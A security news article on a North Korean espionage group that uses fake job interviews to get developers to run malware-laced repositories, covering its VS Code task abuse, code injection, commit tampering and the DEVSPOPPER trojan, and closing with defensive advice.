North Korean Hackers Exploit Fake Job Interviews to Infect Developers’ Code Repositories
A North Korean cyber espionage group, known as Void Dokkaebi or Famous Chollima, has been orchestrating a sophisticated campaign targeting software developers through deceptive job interviews. This operation aims to infiltrate developers’ systems and propagate malware via compromised code repositories.
The Deceptive Approach
The attackers initiate contact by posing as recruiters from reputable cryptocurrency and artificial intelligence firms on professional networking platforms. They engage developers in fabricated interview processes, culminating in a technical assessment that requires the candidate to clone and execute code from a provided repository. Unbeknownst to the developer, these repositories are laced with malicious code designed to activate upon execution.
Mechanisms of Infection
Once the developer runs the compromised code, the malware establishes a foothold on the system. Void Dokkaebi employs two primary methods to ensure the malware’s persistence and spread:
1. Exploitation of Visual Studio Code Configurations: The attackers manipulate the `.vscode/tasks.json` file within the project. This file is configured to execute automatically when the project is opened in Visual Studio Code. Upon the developer’s acceptance of the workspace trust prompt, the malicious task runs, either fetching a backdoor from a remote server or executing a payload concealed within the repository.
2. Direct Code Injection: After gaining remote access, the attackers inject obfuscated JavaScript into the source files of the developer’s repositories. This code is strategically placed to remain hidden during cursory reviews. A batch script, `temp_auto_push.bat`, is utilized to alter the Git commit history, making the malicious changes appear as legitimate contributions.
Escalation and Propagation
By March 2026, the campaign had escalated significantly. Trend Micro Research identified over 750 infected repositories, more than 500 malicious Visual Studio Code task configurations, and 101 instances of commit tampering tools across public code hosting platforms. Notably, repositories associated with organizations such as DataStax and Neutralinojs were found to be compromised, indicating the campaign’s reach into prominent open-source projects.
The malware delivered is a variant of the DEVSPOPPER remote access trojan, a cross-platform Node.js-based tool. It connects to a command-and-control server via WebSocket and uses HTTP for file exfiltration. The trojan is designed to detect and avoid continuous integration/continuous deployment (CI/CD) environments and cloud sandboxes, ensuring it operates exclusively on actual developer workstations.
Preventive Measures
To mitigate the risk of such sophisticated attacks, developers and organizations are advised to:
– Isolate Untrusted Code: Execute code from unknown or unverified sources within isolated environments to prevent potential system compromise.
– Review Repository Configurations: Regularly inspect project configurations, especially files like `.vscode/tasks.json`, for unauthorized or suspicious entries.
– Monitor for Unauthorized Changes: Implement monitoring tools to detect unexpected modifications in code repositories, including hidden or obfuscated code.
– Educate and Train Developers: Conduct regular training sessions to raise awareness about social engineering tactics and the importance of verifying the authenticity of recruitment communications.
By adopting these proactive measures, the software development community can enhance its resilience against such insidious cyber threats.
